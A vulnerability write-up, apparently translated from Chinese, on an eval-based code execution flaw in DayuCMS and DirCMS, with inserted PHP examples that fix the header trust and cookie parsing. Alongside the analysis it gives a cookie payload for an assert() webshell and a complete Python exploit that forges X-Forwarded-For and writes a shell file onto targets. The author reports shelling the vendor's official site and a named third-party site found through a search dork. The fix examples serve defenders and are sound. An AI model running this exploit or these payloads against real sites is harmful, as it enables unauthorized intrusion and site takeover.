DayuCMS 1.526 and DirCMS frontend arbitrary code execution analysis and POC
DayuCMS directly uses eval in functions that convert strings into arrays and has controllable variables, resulting in arbitrary code execution.
DayuCMS appears to be based on the DirCMS code; the two code bases are almost identical. This article analyzes DayuCMS only.
0x01. Vulnerability description

DayuCMS directly uses eval in the function that converts strings into arrays, and the variable passed to it is user-controllable, resulting in arbitrary code execution.
Affected versions:
All DayuCMS versions (latest version 1.526 and below)
All DirCMS versions (no updates available)

0x02. Vulnerability details
pay/order.php

$payobj = new pay();
$action = isset($action) ? $action : 'step1';
session_start();
$cookiekey = dayucms_md5('productarray'.IP);
$productarray = string2array(get_cookie($cookiekey));
The IP constant in the code above is defined in include/common.inc.php:

define('IP', getIp());

include/global.func.php

// Obtain the ip address
function getIp() {
    $ip = 'unknown ip';
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return is_ip($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : $ip;
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return is_ip($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $ip;
    } else {
        return is_ip($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : $ip;
    }
}
Because the Client-IP and X-Forwarded-For headers are read before REMOTE_ADDR, the IP address can be forged simply by sending an X-Forwarded-For header.
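The header-trust problem above is independent of the eval bug, and it is what lets the cookie key become predictable. The following is an added example and not DayuCMS/DirCMS code: a replacement for getIp() that honours X-Forwarded-For only when the TCP peer is one of the site's own reverse proxies, and otherwise uses the peer address the server actually saw. The function name getIpSafe, the TRUSTED_PROXIES list and the sample request arrays are assumptions constructed for the demonstration; the CMS's own getIp() and is_ip() are not used.

```php
<?php
// Added example, not DayuCMS/DirCMS code: getIp() rewritten so that the
// X-Forwarded-For header is honoured only when the TCP peer is one of our
// own reverse proxies. For every other request the peer address reported by
// the server is used, so a client cannot choose the value that later feeds
// dayucms_md5('productarray'.IP).

// Assumed deployment value: the addresses of your own reverse proxies.
const TRUSTED_PROXIES = array('10.0.0.5');

function getIpSafe(array $server)
{
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return 'unknown ip';
    }
    if (!in_array($remote, TRUSTED_PROXIES, true)) {
        // Direct client: every request header is client-controlled, so the
        // forwarding headers are ignored entirely.
        return $remote;
    }
    // Behind a single trusted proxy layer: the proxy appends the address it
    // saw as the last entry, and that is the only entry it vouches for.
    $xff  = isset($server['HTTP_X_FORWARDED_FOR']) ? $server['HTTP_X_FORWARDED_FOR'] : '';
    $hops = array_map('trim', explode(',', $xff));
    $last = end($hops);
    if ($last !== '' && filter_var($last, FILTER_VALIDATE_IP) !== false) {
        return $last;
    }
    return $remote;
}

// Constructed requests for demonstration: the same forged header arriving
// directly from a client, and arriving via the trusted proxy.
$direct  = array('REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_FORWARDED_FOR' => '2.2.2.2');
$proxied = array('REMOTE_ADDR' => '10.0.0.5',    'HTTP_X_FORWARDED_FOR' => '2.2.2.2, 198.51.100.7');

echo getIpSafe($direct), "\n";   // the forged header is ignored, the peer address is returned
echo getIpSafe($proxied), "\n";  // the entry the proxy itself appended is returned
```

Even with this change, deriving a cookie name from the client address only makes the name harder to guess; it is not a security boundary, and the cookie value still must not reach eval.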
include/common.inc.php

function dayucms_md5($str) {
    return substr(md5($str), 8, 16);
}

// convert a string to an array
function string2array($str) {
    if (disablefunc('eval')) exit('function eval is disabled and may not work properly!');
    if ($str == '') return array();
    if (is_array($str)) return $str;
    @eval("\$array = $str;");
    return $array;
}

function get_cookie($var) {
    $var = COOKIE_PRE.$var;
    return isset($_COOKIE[$var]) ? $_COOKIE[$var] : false;
}
The intended usage of string2array is:

$tmp = 'array("hello" => "world")';
$arr = string2array($tmp);
var_dump($arr); // $arr is an array

However, if the string2array parameter $str is 1;echo 222, then, because eval executes multiple statements separated by semicolons, the evaluated code becomes

@eval("\$array = 1;echo 222;");

and the injected statement runs, so the function is an arbitrary code execution sink.
Many CMSs have a function like string2array. For example, line 237 of phpcms/libs/functions/global.func.php in phpcms v9:

function string2array($data) {
    if($data == '') return array();
    eval("\$array = $data;");
    return $array;
}
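Both string2array implementations above (DayuCMS and phpcms) fail the same way: the stored string is PHP source, so the only way to turn it back into data is to execute it. The fix is to store data, not code. The following is an added example and not code from DayuCMS, DirCMS or phpcms: the cookie is written as JSON and read back with json_decode, so a value shaped like 1;echo 222 is rejected instead of evaluated. The names array2string_safe and string2array_safe and the sample inputs are assumptions constructed for the demonstration; the CMS's own writer function is not shown on the page, so its counterpart here is assumed.

```php
<?php
// Added example, not DayuCMS/DirCMS/phpcms code: a string2array() that never
// hands its input to eval(). The cookie carries JSON instead of PHP source.

// Writer side (assumed counterpart of the CMS's own array2string()).
function array2string_safe(array $array)
{
    return json_encode($array);
}

function string2array_safe($str)
{
    if (is_array($str)) {
        return $str;
    }
    if (!is_string($str) || $str === '') {
        return array();
    }
    // The depth limit keeps a hostile cookie from exhausting the parser.
    $decoded = json_decode($str, true, 32);
    if (!is_array($decoded)) {
        // Malformed, scalar, or code-bearing input is treated as "no data"
        // instead of being executed.
        return array();
    }
    return $decoded;
}

// Constructed inputs for demonstration.
$legit   = array2string_safe(array('hello' => 'world'));
$hostile = '1;echo 222';                  // the injection shape from the write-up
$legacy  = 'array("hello" => "world")';   // the old PHP-source format

var_dump(string2array_safe($legit));      // the original array is recovered
var_dump(string2array_safe($hostile));    // empty array, nothing is executed
var_dump(string2array_safe($legacy));     // empty array: old-format cookies are no longer readable
```

The third case is the migration cost of this change: cookies written in the old PHP-source format stop being readable, which for a shopping-cart cookie means a user re-adds their items once. That is preferable to keeping any code path in which a cookie value reaches eval.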
data/config.inc.php

The COOKIE_PRE constant used by get_cookie is defined here:

define('COOKIE_PRE', 'rNsg2Zrbzn'); // COOKIE prefix. When multiple copies of DirCMS are installed under the same domain name, modify the cookie prefix.
The DayuCMS code still says DirCMS in this comment, which tells you something, Orz..

On a first installation the COOKIE_PRE value is fixed at TEVqv2KtR5; later installations generate it randomly.

From the code above it is clear that this is an arbitrary code execution.

However, for the POC to work in any environment, a fixed IP address has to be forged, so 2.2.2.2 is used.

Back in order.php, $cookiekey then becomes 060b8081c32887f8. Prefixed with COOKIE_PRE, this is the name of the cookie that needs to be set.
0x03. Vulnerability exploitation

First, access pay/order.php and read COOKIE_PRE from the returned cookie name: rNsg2Zrbzn, after stripping the siteid suffix.

Then use Modify Headers to set X-Forwarded-For to 2.2.2.2.

With the IP address 2.2.2.2, $cookiekey was computed above as 060b8081c32887f8, so the name of the new cookie is rNsg2Zrbzn060b8081c32887f8. When pay/order.php is accessed again, get_cookie no longer returns false, string2array is called on the cookie value, and the code we constructed runs.

Create the cookie with the content

<?php assert($_POST[x]); ?>

Access pay/order.php again to execute the code and obtain a shell.

At the time of writing, the official DayuCMS website can still be shelled this way.
0x04. POC

# coding: utf-8
import requests
import sys
import hashlib
import urllib

__author__ = 'joychou'
__date__ = 'May 27, 2015 19:13:48'


def is_url_getshell(url):
    order = url[-13:]
    if order != 'pay/order.php':
        print 'The url can not getshell...'
        sys.exit()


def printinfo():
    print '''#########################################################
#           Dayucms or dircms Getshell EXP              #
#   Version: dayucms <= 1.526 and all dircms            #
#   Blog: www.joychou.org                               #
#########################################################
Usage:   exp.py url
Example: exp.py http://www.dayucms.com/pay/order.php
'''


def md5(str):
    return hashlib.md5(str).hexdigest()


def dayucms_md5(str):
    return md5(str)[8:24]


# param:  http://victim.com/upload/test.php
# return: http://victim.com/upload/
def spilit_url(url):
    m = 0
    for i in url[::-1]:  # reverse url
        m += 1
        if i == '/':
            break
    url_spilit = url[:-(m - 1)]
    return url_spilit


def main(url):
    ip = '2.2.2.2'
    try:
        r = requests.get(url)
    except Exception, e:
        print e
        sys.exit()
    cookie = r.cookies
    # get cookie_pre from cookie of client request
    for cookie_tuple in cookie.items():  # cookie.items() returns a list of tuples
        for key in cookie_tuple:
            if 'siteid' in key:
                cookie_pre = key
                break
    cookiekey = dayucms_md5('productarray' + ip)
    cookiekey = cookie_pre[:-6] + cookiekey
    print 'X-Forwarded-For is: %s' % ip
    print 'cookiekey which need to add is: %s' % cookiekey
    print ''
    false_headers = {'X-Forwarded-For': ip}
    # %3b is the urlencode of ;
    # ; must be replaced by %3b, because in cookies ; means that one cookie is over
    # shell password is x
    shell = '1%3bfputs(fopen(base64_decode(c21pbGVudC5waHA),w),base64_decode(response))'
    false_cookies = {cookiekey: shell, cookie_pre: '1'}
    r = requests.get(url, cookies=false_cookies, headers=false_headers)
    url_shell = spilit_url(url) + 'smilent.php'
    r = requests.get(url_shell)
    if r.status_code == 200:
        print 'getshell success!'
        print 'Shell url is %s' % url_shell
    else:
        print 'getshell fail...'


if __name__ == '__main__':
    printinfo()
    if len(sys.argv) != 2:
        print 'input error'
        sys.exit()
    is_url_getshell(sys.argv[1])
    main(sys.argv[1])
Searching Baidu for "powered by dircms" to test DirCMS, I found the target http://www.sywbs.com.cn/pay/order.php and got a shell successfully.